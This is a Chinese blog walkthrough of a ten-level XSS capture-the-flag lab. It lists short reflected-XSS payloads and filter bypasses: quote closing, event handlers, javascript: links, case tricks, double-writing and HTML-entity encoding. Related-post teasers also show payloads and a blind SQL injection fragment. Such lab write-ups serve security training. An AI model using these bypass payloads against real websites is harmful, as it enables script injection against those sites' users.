XSS http://xss-ctf.xiejiahe.com/

重庆第一单纯渗透佬

于 2024-07-05 15:16:49 发布

阅读量301

点赞数 4

文章标签： xss 前端

本文链接：https://blog.csdn.net/qq_16163981/article/details/140208692

版权

第一关

第二关

1"> <script>alert(1)</script> <"1

1、无任何过滤

2、实体化输入框没有

"> <script>alert()</script> <"

3、全部实体化利用标签事件单引号闭合

' οnfοcus=javascript:alert() '

4、全部实体化利用标签事件双引号闭合

" οnfοcus=javascript:alert() "

5、事件关键字过滤利用其他标签调用双引号闭合

"> <a href=javascript:alert()>xxx</a> <"

6、利用大小写未正则匹配

"> <sCript>alert()</sCript> <"

7、利用双写绕过匹配

"> <a hrehreff=javasscriptcript:alert()>x</a> <"

8、利用Unicode编码

&#x006a&#x0061&#x0076&#x0061&#x0073&#x0063&#x0072&#x0069&#x0070&#x0074&#x003a&#x0061&#x006c&#x0065&#x0072&#x0074&#x0028&#x0029

9、利用Unicode编码（内容检测）

&#x006a&#x0061&#x0076&#x0061&#x0073&#x0063&#x0072&#x0069&#x0070&#x0074&#x003a&#x0061&#x006c&#x0065&#x0072&#x0074&#x0028)('http://')

10、隐藏属性触发闭合

?t_sort=" οnfοcus=javascript:alert() type="text

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

重庆第一单纯渗透佬

关注关注

4
点赞
踩
4

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

xss-labs 通关教程

SkyWT 的博客

07-05

1985

XSS 攻击历久弥新，目前 XSS 漏洞依然广泛存在。其核心在于找到注入点并通过 payload 让浏览器执行 js 代码。注入点不仅可以来源于用户提供的文本（请求参数或后端存储的字段），也可以是 Referer、UA、Cookie 等。通过<script>标签。通过元素的 onmouseover 属性。通过<img>的 onerror 属性，如。通过 URI，如。一般来说，使用 PHP 的函数能够防御很大一部分 XSS（注意过滤单引号）。许多字符过滤上的漏洞都是没有使用。

ctf xss利用_TCTF/0CTF2018 XSS Writeup

weixin_29923451的博客

01-14

522

作者：LoRexxar'@知道创宇404实验室刚刚4月过去的TCTF/0CTF2018一如既往的给了我们惊喜，其中最大的惊喜莫过于多道xss中Bypass CSP的题目，其中有很多应用于现代网站的防御思路。其中bl0g提及了通过变量覆盖来调用已有代码动态插入Script标签绕过strict-dynamicCSP的利用方式。h4xors.club2则是通过Script Gadgets和postmes...

参与评论您还未登录，请先登录后发表或查看评论

xss-labs靶场一到十关

zxcvbnm123456x的博客

06-26

831

xss的靶场地址为：http://test.ctf8.com/需要先打开phpstudy才能进行练习。

XSS-labs通关

em.....

10-24

4281

XSS-labs通关 1.第一关 payload： http://xss/level1.php?name=<Script>alert(1)</Script> 2.第二关这里变量出现在两处，我们直接利用第二处，做构造以及闭合 payload： 1"><ScRipt>alert(1)</ScRipt> 3.第三关用第二关的payload去试一下，发现内容没变化，但是就是没当成js代码查一下网页源代码和php代码看

xsslabs通关

j2941174356的博客

09-11

169

xsslabs通关第二关闭合绕过对传入的值进行了 HTML的实体转换但是没有对第二传入的值进行实体化所以将第二个标签闭合后写入弹窗代码（文本框些如就可以） htmlspecialchars函数只针对大于小于号进行html实体化第三关 HTML实体化通过不使用号绕过HTMl实体化使用不需要

XSS-labs 通关

qq_74806534的博客

04-01

294

发现get传参啥，就显示啥，应该对name没啥过滤。那我们直接传payload。

XSS-labs 通关实录

yingu9267的博客

05-02

786

XSS攻击与sql注入逻辑相似，找到注入点，插入恶意代码，过滤绕过……1。

express.js-ctf:用express.js编写的CTF挑战

05-04

《Express.js CTF挑战解析与实战指南》 Express.js，作为Node.js生态系统中最流行的Web应用框架，被广泛用于构建各种类型的Web服务。CTF（Capture The Flag）是一种网络安全竞赛，通常涉及解谜、逆向工程、编程和...

http://blackguest00.3vhost.club/demo2/如何找到该网站的flag

05-14

但是，如果您是在参加CTF比赛，寻找flag的线索，我建议您仔细查看网站的源代码、网页中的注释和任何隐藏的信息。您可以尝试使用一些工具，如Burp Suite或Fiddler，来捕获网页的网络流量，看看是否有任何有用的信息。...

CTFHUB历年真题练习

qq_51558360的博客

10-11

1418

WebsiteManger 考点布尔盲注、SSRF 尝试了一般登录方法没有反应。查看源码发现sql注入的利用点在图片上盲注脚本 import string from requests import * allstr = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!"#$%&\'()*+,-./:;<=>?@[\]^_`{|}~' myurl = 'http://challenge-1993b

xss-labs通关.pdf

04-20

xss-labs靶场20关全通关攻略

ctf-browser-visitor:Bot访客服务，应对CTF中的XSS挑战

05-04

ctf浏览器访问者 Bot访问者应对CTF中的XSS挑战 http://127.0.0.1:5000/visit?job={"url":"url_to_visit","cookies":{"key":"value"}}

xss-labs通关教程

最新发布

weixin_64712672的博客

06-18

977

xss-labs通关教程

XSS-Labs通关（1-18）

weixin_46099095的博客

03-21

4763

Level1：通过修改name=xx，我们发现，欢迎用户test的test随着xx的值改变输入: name=<script>alert(1)</script> Level2：直接输入上一关payload,<script>alert(1)</script> 查看源代码我们需要将value=""闭合，所以我们输入"><script>alert(1)</script> Level3..

xss_labs通关教程

qq_48904485的博客

03-23

659

level1 1、url输入特殊字符判断位置 2、构造Payload /level1.php?name=</h2><script>alert("xss")</script> level2 1、url输入特殊字符判断位置 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-BKe2fY6Q-1647921941027)(C:\Users\23850\AppData\Roaming\Typora\typora-user-images\image-

XSS-labs靶场通关

weixin_70292186的博客

05-08

1040

首先说一下embed标签,可以理解为定义了一个区域，可以把html文档、图片、视频、音频等内容内嵌到当前页面,这关浏览器不支持flash插件,所以图片显示不出来,如果感觉别扭,就在后端把。里面的链接失效了,这关跳过,不过提一句,这关涉及到了exif漏洞,原理是有些网站有读取图片exif信息的功能，当网站读取到的恶意的exif信息就会触发属性中的。发现有的转义,还在script中间加了下划线_,接着尝试闭合,同样存在闭合和转义,所以利用a标签的href来闭合。的,所以加个type="text"

xss-labs通关（未完成）

omh164052427的博客

02-24

318

本篇为本人xss—labs通关，未完成之前会一直编辑 level1 上来一头雾水，不知道该怎么办，之后我们可以赋值test试一试，查看源代码从这里我们可以看到它将name的参数值，插入到了<h2> </h2>标签之间那么就很明显，这一关主要就是考察反射型xss 但是由于不知道服务器端对于提交的敏感字符有没有过滤，所以这里直接在name参数中赋值一个简单的弹窗来进行测试。操作如下：将name参数重新赋值：<script>alert('

xss-labs 通关合集

nareku的博客

07-22

398

看看源码看三个箭头指向，可以发现它是通过GET传参name参数，值为“test”,并且在页面回显回来，还显示了name参数值的字符长度。那么就很明显是反射型XSS了，那就先从简单的开始，直接在name参数中赋值一个简单的弹窗来测试可以看到服务端对输入的参数没有任何过滤，服务器直接将我们的恶意代码原封不动的返回并且解析了，浏览器才能成功弹窗。......